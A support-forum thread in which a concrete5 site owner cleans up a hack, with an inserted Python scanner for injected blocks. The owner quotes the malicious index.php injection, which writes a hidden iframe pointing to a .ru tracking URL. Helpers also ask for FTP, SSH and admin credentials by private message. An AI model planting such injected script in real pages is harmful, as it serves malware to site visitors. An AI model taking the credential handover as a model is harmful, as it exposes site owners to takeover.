Malware on my C5?

I've been seeing this error
http://screencast.com/t/5yoK5sqEWYf...

I have a report in to my host to help me look, but so far everyone is saying to check my code.

How exactly does a person check every page visually in C5???

Is there a way to search or find this easier?

I was hacked a month back. It just seems to appear now.
Please help. I'd even be willing to hire someone to secure my site.

Thank You.

 
TMDesigns replied:
Hi,

I would download your whole site, then do a search for "<script" in something like Dreamweaver.

You will find something like this on the site: http://sophosnews.files.wordpress.com/2012/02/iframe-w-code.jpg?w=640

More than likely, and it is normally in an index.html or default.html file.

Have a read of this
http://www.squidoo.com/how-to-find-a-malware-script...
stonereptiles replied:
Thank you.
I'll be reading through that, but every folder on my site was "last modified" within the last 2 or 3 days, so I'll bet I've been hammered hard.
I found that remove string software. Maybe I'll take a look at it.

Quotes I've seen for fixing this are in the hundreds of dollars :( We are a non-profit group.

Thanks
stonereptiles replied:
Found this in the index.php

#afa977#
echo "
<script type=\"text/javascript\" language=\"javascript\" >
(function(){ var a = document.createElement('iframe'); a.src = 'http://zaefofin.ru/count8.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})();</script>";
#/afa977#


And that remove program failed to even open for me.
I'm unsure how much of that I can delete without ruining the website :(
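As an added example (not part of the original thread or any poster's code): a small scanner for a downloaded copy of the site that finds blocks delimited by paired markers like the `#afa977#` ... `#/afa977#` pair above and removes only those blocks, leaving the rest of each file intact. It assumes other infected files use the same marker shape with a six-hex-digit tag; the sample input and its URL are constructed placeholders.

```python
import re
from pathlib import Path

# Paired markers as in the post above: "#afa977#" ... "#/afa977#".
# Assumption: other infected files use the same shape with some 6-hex-digit tag.
MARKED_BLOCK = re.compile(r"#([0-9a-f]{6})#(.*?)#/\1#", re.DOTALL)
# Only flag a marked block if it actually carries script/iframe code.
SUSPICIOUS = re.compile(r"<script|<iframe|createElement\(\s*['\"]iframe", re.I)
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js"}

# Constructed sample modelled on the posted index.php; the URL is a placeholder.
SAMPLE = (
    "<?php\n#afa977#\n"
    "echo \"<script type=\\\"text/javascript\\\">(function(){ "
    "var a = document.createElement('iframe'); "
    "a.src = 'http://malicious.example/count.php'; })();</script>\";\n"
    "#/afa977#\nrequire('concrete/dispatcher.php');\n"
)

def find_injections(text):
    """Return (tag, start, end) for each marked block that contains script/iframe code."""
    return [(m.group(1), m.start(), m.end())
            for m in MARKED_BLOCK.finditer(text) if SUSPICIOUS.search(m.group(2))]

def strip_injections(text):
    """Cut out the flagged blocks (markers included); nothing else is changed."""
    out, pos = [], 0
    for _tag, start, end in find_injections(text):
        out.append(text[pos:start])
        pos = end
    out.append(text[pos:])
    return "".join(out)

def scan_tree(root):
    """Walk a site copy and return {relative path: [marker tags]} for infected files."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            found = find_injections(path.read_text(errors="replace"))
            if found:
                hits[str(path.relative_to(root))] = [tag for tag, _, _ in found]
    return hits

if __name__ == "__main__":
    import sys
    for rel, tags in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(f"{rel}: injected block(s) tagged {', '.join(tags)}")
```

Run it against a downloaded copy first and review the list of flagged files before writing any cleaned output back with `strip_injections`.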
jmonroe replied:
I can take a look at it if you are willing to pm me your ftp details to your host.
jmonroe replied:
I see what the problem is. Every single folder is infected. If you can pm me once you tell your host you need ssh access to your folders, it will go much quicker for me to remove the infection. Let me know when this is done. I won't be up much longer as it is almost midnight here.

Thanks
stonereptiles replied:
As far as I know SSH is enabled? I will see if there is an option but I'm not seeing it.

John, I've done that, but now the site's acting stupid. The background image on Firefox seems to overlay my content, even though I see the content, and does not allow me to click on anything.

I'm unsure how damaged this site is, and it seems my last update was also infected. Otherwise I go back months.

Edit:
Nothing's even clickable on my /login/ page within Firefox. I.E. is also acting weird.
jmonroe replied:
I tried to SSH into it but it tells me it's disabled then logs me out. I know what the problem is. It has put the infected files in every folder. It will be easier to remove them all if I can SSH because I can run a command that will pull them all out versus having to go in each folder like I was last night one by one. Call up your host and ask them to enable SSH for you.

Let me know. Thanks.
stonereptiles replied:
Yes I'm sorry I see it now.

Shell account - allows SFTP/FTP plus ssh access.

Enabled. Sorry
jmonroe replied:
No need for apologies. Just glad you found it. Thanks! Will let you know shortly.

I may have to wait a few minutes as it hasn't allowed SSH just yet.
JohntheFish replied:
As well as cleaning up the infected files, you need to close whatever mechanism allowed the site to become infected. Without preventing future infection, after any cleanup it will simply happen again.
TMDesigns replied:
If you PM me the FTP details I can fix it.
stonereptiles replied:
Thank you for the offer. Someone's already in looking at it for me. I think two of you in there would cause more trouble for you guys. If he is unable to figure out the site issue I will contact you.
Thank you!

Sent from my iPhone
jmonroe replied (Best Answer):
Your site is back up and running and all the links at the top are working again.

If I have been helpful, please mark my answer as so.

Thanks Shawn!

--Jeremy
stonereptiles replied:
The home page is loading with an error, and won't load my admin tool bar up top. Any idea why it may be doing that?

Thank you again. I think all the malware is gone. I hope.
jmonroe replied:
I don't get an error message when viewing your site from my computer nor my phone. Try clearing cache and see if that helps.
stonereptiles replied:
When I am logged in as admin the top tool bar is blank, and if I try going to site map and click on a page I get no pop up and can't seem to create or edit pages.

Any idea why that would be gone? I'm thinking something got removed maybe?
jmonroe replied:
I only removed the same six infected files from every folder and none of them are c5 files. They were tracking and script files. PM the backend credentials and I will see if I can figure something out.
stonereptiles replied:
Oh, I don't think you did anything. It may have been me or, who knows. I'll send you my admin login details now.

Thank You again!